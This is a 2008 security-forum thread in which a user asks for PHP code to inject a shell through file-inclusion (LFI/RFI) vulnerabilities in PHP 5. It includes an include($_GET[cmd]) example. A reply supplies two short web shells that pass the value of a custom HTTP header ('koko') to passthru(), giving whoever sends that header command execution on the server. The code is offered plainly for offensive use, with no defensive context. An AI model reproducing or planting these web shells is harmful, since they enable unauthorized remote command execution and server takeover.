 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 50
 Members: 0
 Total: 50
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
PHP version 5 exploits ? |
|
 Posted: Sun Apr 20, 2008 3:59 pm |
 |
|
| nuckel |
| Active user |
 |
|
| Joined: Mar 25, 2008 |
| Posts: 28 |
|
|
|
 |
|
 |
|
Hi all 
How I can inject a shell, in php version 5.x, I mean, I need a PHP code for the LFI & RFI exploits
to exploite it 
thankx . . . |
|
|
|
|
| Posted: Mon Apr 21, 2008 5:17 pm |
|
|
| pexli |
| Valuable expert |
 |
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| I don't understand a shitt. |
|
|
|
|
| Posted: Mon Apr 21, 2008 7:28 pm |
|
|
| nuckel |
| Active user |
|
|
| Joined: Mar 25, 2008 |
| Posts: 28 |
|
|
|
|
|
|
|
| koko wrote: | | I don't understand a shitt. |
i mean an Vulnerability to exploite it , look's at the examples :
| Code: | | <?include($_GET[cmd])?> |
this exploit , it's working in PHP version 4.x.x , but in PHP version 5.x.x , does not work , so i want and i need a small code PHP exploit for PHP version 5.x.x , and thankx for any Help |
|
|
|
|
| Posted: Tue Apr 22, 2008 3:08 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| Code: | | <? if (@getenv(HTTP_koko)) {@passthru(@getenv(HTTP_koko));} else{phpinfo();} ?> |
Headers
koko: <w>
| Code: | | <?php @passthru(@getenv("HTTP_koko"));exit;?> |
Headers
koko: <w> |
|
|
|
|
www.waraxe.us Forum Index -> All other security holes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
